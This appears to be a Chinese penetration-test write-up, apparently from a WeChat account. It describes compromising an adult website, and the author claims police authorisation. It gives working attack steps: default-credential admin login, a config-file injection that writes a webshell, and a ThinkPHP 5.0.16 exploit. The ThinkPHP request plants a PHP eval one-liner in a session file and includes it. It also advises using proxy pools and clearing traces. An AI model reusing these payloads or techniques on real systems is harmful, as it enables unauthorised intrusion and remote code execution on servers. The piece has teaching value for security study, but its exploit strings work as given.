实战 | 记一次某18网站打击

记一次非法网站的打击，本次打击已获公安授权

一眼看去 满满的顶不住哇

首先观察网站信息 经典的「久草cms」 直接开打

参考复现文章

https://www.adminxe.com/2347.html

https://cloud.tencent.com/developer/article/2149425

什么都具备了 但是后台 改了默认路径 哈哈

emm先放一放

再到处点一点 看看接口走向啥的

这里也提一下前端信息收集的小姿势

❝

JS文件中能找到什么？

• 会增加攻击面（URL、接口、域名）
• 敏感信息（用户名密码、ak/sk、token/session）
• 代码中的潜在危险函数（eval、dangerallySetInnerHTML）
• 具有已知漏洞的框架（JQuery、React)

❞

如何寻找呢

脚本小子

https://github.com/Threezh1/JSFinder
python3 JSFinder.py -u http://www.test.com/

或者Burp History中查找 这个有时候有意想不到的后果

推荐Burp插件 Unexpected.information

然后就是F12了   通过搜索敏感词：pass、accesskey、secret

当然 这个站完全没有 真的假的 这么硬？

上目录扫描  dir一下

另外小伙伴们在打击的时候一定要记得挂代理池

加强字典 找到了个后台地址 /admin-odkazy.php

尝试9ccms 默认口令 密码 成功进入后台

密码修改文件写入 这个cms的源码网上随便找 虽然已经被打烂了 但还是简单审计下

通过页面和配置文件所得

在此输入的都会被写入/JCSQL/Admin/Security/AdminUser.php

例如

闭合写入

写入webshell，保存蚁剑连接即可 但是遗憾的是 该服务器限制了命令执行的函数 尝试绕过无果 无法进行进一步操作

当然这样是不是太简单了？就这 我怎么给同学们当案例讲 不急 我们接着看

上面进行了目录扫描，端口 子域名呢？可不可能还有其他的旁站

尝试  子域名挖掘 挖到了 个旁站  与主站的ip服务器 不相同 有点意思

老规矩 简单的信息收集一波 发现个后台地址 尝试弱口令 这次 运气没那么好 祖传大字典都顶不住了

咋办 就一个后台 其他的信息也没有 在url框任意输入 哦豁 报错了

这熟悉的logo 这熟悉的十年磨一剑 有戏

Thtinkphp 5.0.16  上梭哈工具  无果

手工测试 网上的利用链 打了一遍 但是不知道为什么都没有成功 有点离谱 🤔

仔细观察 页面报错

页面回显参数中还有「Session」和「PHPSESSID」

尝试 包含写入

Sessionid包含写入一句话木马

Payload：

_method=__construct&filter[]=thinkSession::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1

替换id值，并执行phpinfo查看是否正常写入

_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=/tmp/sess_xxxxxxxxxx&c=phpinfo();

成功回显phpinfo 后面蚁剑连接就好

至此已成功拿到这个小h站的两台服务器权限（第一台有点虚），清理痕迹 交报告

本篇文章中所提到的工具:burp2023.2.4等都已经打包啦 公众号后台回复 「0402」 就好啦